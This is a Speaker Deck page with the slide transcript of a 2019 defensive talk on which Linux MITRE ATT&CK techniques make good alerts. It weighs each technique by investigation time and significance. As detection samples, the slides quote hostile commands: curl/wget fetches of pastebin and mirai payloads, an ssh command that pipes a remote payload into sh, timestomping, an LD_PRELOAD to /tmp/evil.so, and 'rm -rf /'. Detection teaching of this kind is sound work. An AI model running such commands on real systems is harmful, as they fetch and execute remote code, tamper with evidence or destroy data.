Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Alertable Techniques for Linux using MITRE ATT&CK

Tony M Lambert
October 29, 2019
Technology
1
2k

Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019
Tweet

More Decks by Tony M Lambert

See All by Tony M Lambert
The Wild World of macOS Installers
forensicitguy
0
20
Whitelisting LD_PRELOAD For Fun and No Profit
forensicitguy
0
250
Spotting Lateral Movement - BSides Augusta 2019
forensicitguy
1
860
Intelligence Driven Testing with Atomic Red Team
forensicitguy
2
330
Spotting Lateral Movement with Endpoint Data
forensicitguy
2
550

Other Decks in Technology

See All in Technology
How to Maximize Effectiveness and Efficiency of Daily Scrum
eiki
0
120
著作権とは何か?〜初歩的概念から権利利用法、侵害要件まで
line_developers
PRO
4
770
できる!アクセシビリティ向上/droidkaigi2023-day2
nikkei_engineer_recruiting
0
910
War for talent 時代の、古くて新しい仲間集めの形_~weak ties と strong tiesの力~
sadonosake
0
260
Boot verification in Android
prashantspol
0
210
Amazon Route 53をやさしくおさらい
minorun365
19
4.3k
OCI IaaS新機能アップデート
oracle4engineer
PRO
1
110
(n=1の)テーブルデータコンペの取り組み方
makotu
1
790
How to test GraphQL API using Postman
yokawasa
0
330
全世界1,800万人が利用する「家族アルバム みてね」におけるNew Relic活用法 / FutureStack Tokyo 2023
isaoshimizu
1
180
GraphQLはどんな時に使うか
saboyutaka
3
2.1k
LOWYAビジネスダッシュボード:DevとBizの共通認識が切り拓く未来
kazumax55
0
110

Featured

See All Featured
Facilitating Awesome Meetings
lara
37
5.1k
Three Pipe Problems
jasonvnalue
89
9.2k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
39
3.9k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
6
7.1k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.7k
Product Roadmaps are Hard
iamctodd
42
8.7k
YesSQL, Process and Tooling at Scale
rocio
159
13k
Side Projects
sachag
450
39k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
271
12k
Art, The Web, and Tiny UX
lynnandtonic
285
18k
From Idea to $5000 a Month in 5 Months
shpigford
376
45k
Support Driven Design
roundedbygravity
91
9.2k

Transcript

  1. Alertable Techniques
    for Linux Using
    MITRE ATT&CK™

    View Slide

  2. ▪ Find & detect adversaries using data
    ▪ Recovering system administrator
    ▪ Love to teach, hate to grade homework
    Tony Lambert
    Detection Engineer/Intel
    Red Canary
    @ForensicITGuy
    id -un

    View Slide

  3. ▪ What’s an alertable technique?
    ▪ Decision criteria for alerting
    ▪ The good, the bad, and the ugly
    Overview

    View Slide

  4. ▪ Notification of abnormal condition
    ▪ Requires context for triage
    ▪ Requires care and feeding for efficacy
    What’s an alert?

    View Slide

  5. Alert Workflow
    Condition
    occurs
    1
    Defender
    investigates
    2 3 4
    Alert fires
    Escalate or hide

    View Slide

  6. ▪ High volume by default
    ▪ Lack of context
    Problems with Alerts

    View Slide

  7. Decision Criteria for Alerts
    ▪ Time to investigate (lower is better)
    ▪ Significance of abnormality (urgent is better)
    ▪ Time to respond (lower is better)

    View Slide

  8. Alerts that don’t suck

    View Slide

  9. Timestomping (T1099)
    touch -acmr /bin/sh /file/to/timestomp
    ▪ Quick to investigate
    ▪ Significant destruction of evidence

    View Slide

  10. Process Injection (T1055)
    /etc/ld.so.preload
    LD_PRELOAD=/tmp/evil.so
    ▪ Quick to respond
    ▪ Used by rootkits, affects user tools

    View Slide

  11. Masquerading (T1036)
    /tmp/kworkerds
    /dev/shm/kthreadds
    ▪ Quick to investigate
    ▪ Signals significant abnormality

    View Slide

  12. We can make these
    work...

    View Slide

  13. Remote File Copy (T1105)
    curl https://pastebin.com/evilThing
    wget http:///mirai.x86
    ▪ Requires much tuning
    ▪ Hunt for outliers in command line

    View Slide

  14. Remote Services (T1021)
    ssh … [email protected] '(curl
    hxxps://pastebin.com/payload | sh'
    ▪ Tune out deployment tools
    ▪ Significant for lateral movement

    View Slide

  15. Worst. Alerts. Ever.

    View Slide

  16. Anything Discovery
    whoami, netstat, ifconfig, etc.
    ▪ OS noise makes high volume
    ▪ Better for cluster analysis

    View Slide

  17. Sudo (T1169)
    sudo ./make_sandwich.sh
    ▪ Long investigations with little return
    ▪ Better for reporting/audits

    View Slide

  18. File Deletion (T1107)
    rm -rf /
    ▪ Probably non-functional rule
    ▪ Helpdesk will know before the alert

    View Slide

  19. Alert where possible,
    report/hunt otherwise
    REDCANARY.COM/BLOG

    View Slide

  20. Q & A
    https://github.com/bfuzzy1/auditd-attack
    https://github.com/Neo23x0/auditd
    RESOURCES

    View Slide